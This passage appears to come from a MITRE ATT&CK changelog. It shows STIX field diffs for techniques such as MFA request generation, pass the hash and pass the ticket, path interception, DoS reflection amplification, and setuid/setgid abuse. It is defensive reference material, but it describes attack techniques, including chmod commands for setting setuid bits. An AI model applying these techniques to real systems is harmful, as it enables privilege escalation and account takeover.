>tication request in response to “MFA fatigue.”(Citation: Rus>hentication request in response to “MFA fatigue.”(Citation: 
>sian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Att>Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue 
>acks - PortSwigger)(Citation: Suspected Russian Activity Tar>Attacks - PortSwigger)(Citation: Suspected Russian Activity 
>geting Government and Business Entities Around the Globe)>Targeting Government and Business Entities Around the Globe)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-05 13:55:20.002000+00:002023-04-04 03:06:34.448000+00:00
descriptionAdversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Logon Session: Logon Session MetadataUser Account: User Account Authentication
x_mitre_data_sources[1]Logon Session: Logon Session CreationApplication Log: Application Log Content
x_mitre_data_sources[2]Application Log: Application Log ContentLogon Session: Logon Session Metadata
x_mitre_data_sources[3]User Account: User Account AuthenticationLogon Session: Logon Session Creation

[T1046] Network Service Discovery

Current version: 3.0

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:05:30.960000+00:002023-03-30 21:01:43.682000+00:00
x_mitre_data_sources[0]Cloud Service: Cloud Service EnumerationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionCloud Service: Cloud Service Enumeration
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/300.html', 'external_id': 'CAPEC-300'}

[T1135] Network Share Discovery

Current version: 3.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesWikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-643
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 18:10:57.185000+00:002023-03-30 21:01:46.370000+00:00
external_references[1]['source_name']capecWikipedia Shared Resource
external_references[1]['url']https://capec.mitre.org/data/definitions/643.htmlhttps://en.wikipedia.org/wiki/Shared_resource
external_references[2]['source_name']Wikipedia Shared ResourceTechNet Shared Folder
external_references[2]['description']Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.
external_references[2]['url']https://en.wikipedia.org/wiki/Shared_resourcehttps://technet.microsoft.com/library/cc770880.aspx
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'TechNet Shared Folder', 'description': 'Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.', 'url': 'https://technet.microsoft.com/library/cc770880.aspx'}
x_mitre_data_sourcesProcess: OS API Execution

[T1499.001] Endpoint Denial of Service: OS Exhaustion Flood

Current version: 1.2

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 23:12:31.329000+00:002023-03-30 21:01:51.289000+00:00
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentSensor Health: Host Status
x_mitre_data_sources[2]Sensor Health: Host StatusNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/469.html', 'external_id': 'CAPEC-469'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/482.html', 'external_id': 'CAPEC-482'}

[T1550.002] Use Alternate Authentication Material: Pass the Hash

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesWarren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-644
values_changed
STIX FieldOld valueNew Value
modified2021-08-31 19:55:02.702000+00:002023-03-30 21:01:45.141000+00:00
external_references[1]['source_name']capecStealthbits Overpass-the-Hash
external_references[1]['url']https://capec.mitre.org/data/definitions/644.htmlhttps://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesUser Account: User Account Authentication
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Stealthbits Overpass-the-Hash', 'description': 'Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.', 'url': 'https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/'}
x_mitre_data_sourcesUser Account: User Account Authentication

[T1550.003] Use Alternate Authentication Material: Pass the Ticket

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMetcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-645
values_changed
STIX FieldOld valueNew Value
modified2021-08-31 19:56:31.341000+00:002023-03-30 21:01:38.108000+00:00
external_references[1]['source_name']capecADSecurity AD Kerberos Attacks
external_references[1]['url']https://capec.mitre.org/data/definitions/645.htmlhttps://adsecurity.org/?p=556
external_references[2]['source_name']ADSecurity AD Kerberos AttacksGentilKiwi Pass the Ticket
external_references[2]['description']Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.
external_references[2]['url']https://adsecurity.org/?p=556http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
external_references[3]['source_name']GentilKiwi Pass the TicketCampbell 2014
external_references[3]['description']Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.
external_references[3]['url']http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberoshttp://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
external_references[4]['source_name']Campbell 2014Stealthbits Overpass-the-Hash
external_references[4]['description']Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.
external_references[4]['url']http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdfhttps://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
external_references[5]['source_name']Stealthbits Overpass-the-HashCERT-EU Golden Ticket Protection
external_references[5]['description']Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
external_references[5]['url']https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'CERT-EU Golden Ticket Protection', 'description': 'Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.', 'url': 'https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf'}
x_mitre_data_sourcesLogon Session: Logon Session Creation

[T1110.002] Brute Force: Password Cracking

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 21:33:46.023000+00:002023-03-30 21:01:48.643000+00:00
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/55.html', 'external_id': 'CAPEC-55'}

[T1574.007] Hijack Execution Flow: Path Interception by PATH Environment Variable

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:08:56.402000+00:002023-03-30 21:01:39.426000+00:00
x_mitre_data_sources[0]File: File CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationFile: File Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/13.html', 'external_id': 'CAPEC-13'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/38.html', 'external_id': 'CAPEC-38'}

[T1574.008] Hijack Execution Flow: Path Interception by Search Order Hijacking

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMicrosoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-159
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 19:03:35.217000+00:002023-03-30 21:01:44.781000+00:00
external_references[1]['source_name']capecMicrosoft CreateProcess
external_references[1]['url']https://capec.mitre.org/data/definitions/159.htmlhttp://msdn.microsoft.com/en-us/library/ms682425
external_references[2]['source_name']Microsoft CreateProcessWindows NT Command Shell
external_references[2]['description']Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.
external_references[2]['url']http://msdn.microsoft.com/en-us/library/ms682425https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
external_references[3]['source_name']Windows NT Command ShellMicrosoft WinExec
external_references[3]['description']Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
external_references[3]['url']https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120http://msdn.microsoft.com/en-us/library/ms687393
external_references[4]['source_name']Microsoft WinExecMicrosoft Environment Property
external_references[4]['description']Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.
external_references[4]['url']http://msdn.microsoft.com/en-us/library/ms687393https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Environment Property', 'description': 'Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.', 'url': 'https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN'}

[T1574.009] Hijack Execution Flow: Path Interception by Unquoted Path

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 20:51:38.118000+00:002023-03-30 21:01:35.788000+00:00
x_mitre_data_sources[0]File: File CreationProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationFile: File Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/38.html', 'external_id': 'CAPEC-38'}

[T1120] Peripheral Device Discovery

Current version: 1.3

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesShahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-646
values_changed
STIX FieldOld valueNew Value
modified2022-03-11 18:39:11.763000+00:002023-03-30 21:01:41.575000+00:00
external_references[1]['source_name']capecPeripheral Discovery Linux
external_references[1]['url']https://capec.mitre.org/data/definitions/646.htmlhttps://linuxhint.com/list-usb-devices-linux/
external_references[2]['source_name']Peripheral Discovery LinuxPeripheral Discovery macOS
external_references[2]['description']Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.SS64. (n.d.). system_profiler. Retrieved March 11, 2022.
external_references[2]['url']https://linuxhint.com/list-usb-devices-linux/https://ss64.com/osx/system_profiler.html
x_mitre_data_sources[0]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Peripheral Discovery macOS', 'description': 'SS64. (n.d.). system_profiler. Retrieved March 11, 2022.', 'url': 'https://ss64.com/osx/system_profiler.html'}

[T1055] Process Injection

Current version: 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 20:58:50.105000+00:002023-03-30 21:01:45.488000+00:00
x_mitre_data_sources[0]Process: Process ModificationModule: Module Load
x_mitre_data_sources[6]Module: Module LoadFile: File Modification
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/640.html', 'external_id': 'CAPEC-640'}
x_mitre_data_sourcesFile: File Modification

[T1498.002] Network Denial of Service: Reflection Amplification

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMarek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-490
values_changed
STIX FieldOld valueNew Value
modified2022-03-25 20:05:38.883000+00:002023-03-30 21:01:41.052000+00:00
external_references[1]['source_name']capecCloudflare ReflectionDoS May 2017
external_references[1]['url']https://capec.mitre.org/data/definitions/490.htmlhttps://blog.cloudflare.com/reflections-on-reflections/
external_references[2]['source_name']Cloudflare ReflectionDoS May 2017Cloudflare DNSamplficationDoS
external_references[2]['description']Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.
external_references[2]['url']https://blog.cloudflare.com/reflections-on-reflections/https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/
external_references[3]['source_name']Cloudflare DNSamplficationDoSCloudflare NTPamplifciationDoS
external_references[3]['description']Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019.
external_references[3]['url']https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
external_references[4]['source_name']Cloudflare NTPamplifciationDoSArbor AnnualDoSreport Jan 2018
external_references[4]['description']Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019.Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.
external_references[4]['url']https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
external_references[5]['source_name']Arbor AnnualDoSreport Jan 2018Cloudflare Memcrashed Feb 2018
external_references[5]['description']Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
external_references[5]['url']https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdfhttps://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
external_references[6]['source_name']Cloudflare Memcrashed Feb 2018Cisco DoSdetectNetflow
external_references[6]['description']Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
external_references[6]['url']https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Cisco DoSdetectNetflow', 'description': 'Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.', 'url': 'https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf'}

[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-16 13:06:00.638000+00:002023-03-30 21:01:52.183000+00:00
x_mitre_data_sources[2]Command: Command ExecutionWindows Registry: Windows Registry Key Creation
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/270.html', 'external_id': 'CAPEC-270'}
x_mitre_data_sourcesWindows Registry: Windows Registry Key Creation

[T1021.001] Remote Services: Remote Desktop Protocol

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMicrosoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-555
values_changed
STIX FieldOld valueNew Value
modified2022-03-28 16:07:44.605000+00:002023-03-30 21:01:41.927000+00:00
external_references[1]['source_name']capecTechNet Remote Desktop Services
external_references[1]['url']https://capec.mitre.org/data/definitions/555.htmlhttps://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
external_references[2]['source_name']TechNet Remote Desktop ServicesAlperovitch Malware
external_references[2]['description']Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.
external_references[2]['url']https://technet.microsoft.com/en-us/windowsserver/ee236407.aspxhttp://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/
x_mitre_data_sources[0]Network Traffic: Network Connection CreationLogon Session: Logon Session Creation
x_mitre_data_sources[1]Logon Session: Logon Session CreationNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Process: Process CreationNetwork Traffic: Network Connection Creation
x_mitre_data_sources[3]Network Traffic: Network Traffic FlowProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Alperovitch Malware', 'description': 'Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.', 'url': 'http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/'}

[T1018] Remote System Discovery

Current version: 3.4

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-06 22:04:59.486000+00:002023-03-30 21:01:50.033000+00:00
x_mitre_data_sources[0]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/292.html', 'external_id': 'CAPEC-292'}

[T1014] Rootkit

Current version: 1.1

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 05:09:39.723000+00:002023-03-30 21:01:50.568000+00:00
x_mitre_data_sources[0]Drive: Drive ModificationFile: File Modification
x_mitre_data_sources[2]File: File ModificationDrive: Drive Modification
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/552.html', 'external_id': 'CAPEC-552'}

[T1608.006] Stage Capabilities: SEO Poisoning

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-27 14:16:24.490000+00:002023-03-13 20:35:52.302000+00:00
x_mitre_attack_spec_version3.0.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsHiroki Nagahama, NEC Corporation
x_mitre_contributorsManikantan Srinivasan, NEC Corporation India
x_mitre_contributorsPooja Natarajan, NEC Corporation India

[T1021.004] Remote Services: SSH

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesSarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-555
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 14:15:06.853000+00:002023-03-30 21:01:49.323000+00:00
external_references[1]['source_name']capecApple Unified Log Analysis Remote Login and Screen Sharing
external_references[1]['url']https://capec.mitre.org/data/definitions/555.htmlhttps://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
x_mitre_data_sources[1]Logon Session: Logon Session CreationProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationLogon Session: Logon Session Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Apple Unified Log Analysis Remote Login and Screen Sharing', 'description': 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.', 'url': 'https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins'}

[T1053] Scheduled Task/Job

Current version: 2.2

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-14 20:59:52.686000+00:002023-03-30 21:01:52.697000+00:00
x_mitre_data_sources[0]Scheduled Job: Scheduled Job CreationProcess: Process Creation
x_mitre_data_sources[1]Container: Container CreationScheduled Job: Scheduled Job Creation
x_mitre_data_sources[2]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[5]Command: Command ExecutionContainer: Container Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/557.html', 'external_id': 'CAPEC-557'}

[T1113] Screen Capture

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMicrosoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-648
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 19:56:37.627000+00:002023-03-30 21:01:39.967000+00:00
external_references[1]['source_name']capecCopyFromScreen .NET
external_references[1]['url']https://capec.mitre.org/data/definitions/648.htmlhttps://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8
external_references[2]['source_name']CopyFromScreen .NETAntiquated Mac Malware
external_references[2]['description']Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.
external_references[2]['url']https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Antiquated Mac Malware', 'description': 'Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.', 'url': 'https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/'}

[T1499.002] Endpoint Denial of Service: Service Exhaustion Flood

Current version: 1.3

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 23:20:50.470000+00:002023-03-30 21:01:43.164000+00:00
x_mitre_data_sources[1]Application Log: Application Log ContentSensor Health: Host Status
x_mitre_data_sources[3]Sensor Health: Host StatusApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/488.html', 'external_id': 'CAPEC-488'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/489.html', 'external_id': 'CAPEC-489'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/528.html', 'external_id': 'CAPEC-528'}

[T1574.010] Hijack Execution Flow: Services File Permissions Weakness

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 19:10:04.262000+00:002023-03-30 21:01:37.026000+00:00
x_mitre_data_sources[0]Service: Service MetadataFile: File Creation
x_mitre_data_sources[2]File: File CreationService: Service Metadata
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/17.html', 'external_id': 'CAPEC-17'}

[T1574.011] Hijack Execution Flow: Services Registry Permissions Weakness

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:53:45.640000+00:002023-03-30 21:01:38.651000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/478.html', 'external_id': 'CAPEC-478'}
x_mitre_data_sourcesCommand: Command Execution

[T1548.001] Abuse Elevation Control Mechanism: Setuid and Setgid

Current version: 1.1


Old Description
New Description
t1An adversary may abuse configurations where an application ht1An adversary may abuse configurations where an application h
>as the setuid or setgid bits set in order to get code runnin>as the setuid or setgid bits set in order to get code runnin
>g in a different (and possibly more privileged) user’s conte>g in a different (and possibly more privileged) user’s conte
>xt. On Linux or macOS, when the setuid or setgid bits are se>xt. On Linux or macOS, when the setuid or setgid bits are se
>t for an application binary, the application will run with t>t for an application binary, the application will run with t
>he privileges of the owning user or group respectively.(Cita>he privileges of the owning user or group respectively.(Cita
>tion: setuid man page) Normally an application is run in the>tion: setuid man page) Normally an application is run in the
> current user’s context, regardless of which user or group o> current user’s context, regardless of which user or group o
>wns the application. However, there are instances where prog>wns the application. However, there are instances where prog
>rams need to be executed in an elevated context to function >rams need to be executed in an elevated context to function 
>properly, but the user running them may not have the specifi>properly, but the user running them may not have the specifi
>c required privileges.  Instead of creating an entry in the >c required privileges.  Instead of creating an entry in the 
>sudoers file, which must be done by root, any user can speci>sudoers file, which must be done by root, any user can speci
>fy the setuid or setgid flag to be set for their own applica>fy the setuid or setgid flag to be set for their own applica
>tions (i.e. [Linux and Mac File and Directory Permissions Mo>tions (i.e. [Linux and Mac File and Directory Permissions Mo
>dification](https://attack.mitre.org/techniques/T1222/002)).>dification](https://attack.mitre.org/techniques/T1222/002)).
> The <code>chmod</code> command can set these bits with bitm> The <code>chmod</code> command can set these bits with bitm
>asking, <code>chmod 4777 [file]</code> or via shorthand nami>asking, <code>chmod 4777 [file]</code> or via shorthand nami
>ng, <code>chmod u+s [file]</code>. This will enable the setu>ng, <code>chmod u+s [file]</code>. This will enable the setu
>id bit. To enable the setgit bit, <code>chmod 2775</code> an>id bit. To enable the setgid bit, <code>chmod 2775</code> an
>d <code>chmod g+s</code> can be used.  Adversaries can use t>d <code>chmod g+s</code> can be used.  Adversaries can use t
>his mechanism on their own malware to make sure they're able>his mechanism on their own malware to make sure they're able
> to execute in elevated contexts in the future.(Citation: OS> to execute in elevated contexts in the future.(Citation: OS
>X Keydnap malware) This abuse is often part of a "shell esca>X Keydnap malware) This abuse is often part of a "shell esca
>pe" or other actions to bypass an execution environment with>pe" or other actions to bypass an execution environment with
> restricted permissions.  Alternatively, adversaries may cho> restricted permissions.  Alternatively, adversaries may cho
>ose to find and target vulnerable binaries with the setuid o>ose to find and target vulnerable binaries with the setuid o
>r setgid bits already enabled (i.e. [File and Directory Disc>r setgid bits already enabled (i.e. [File and Directory Disc
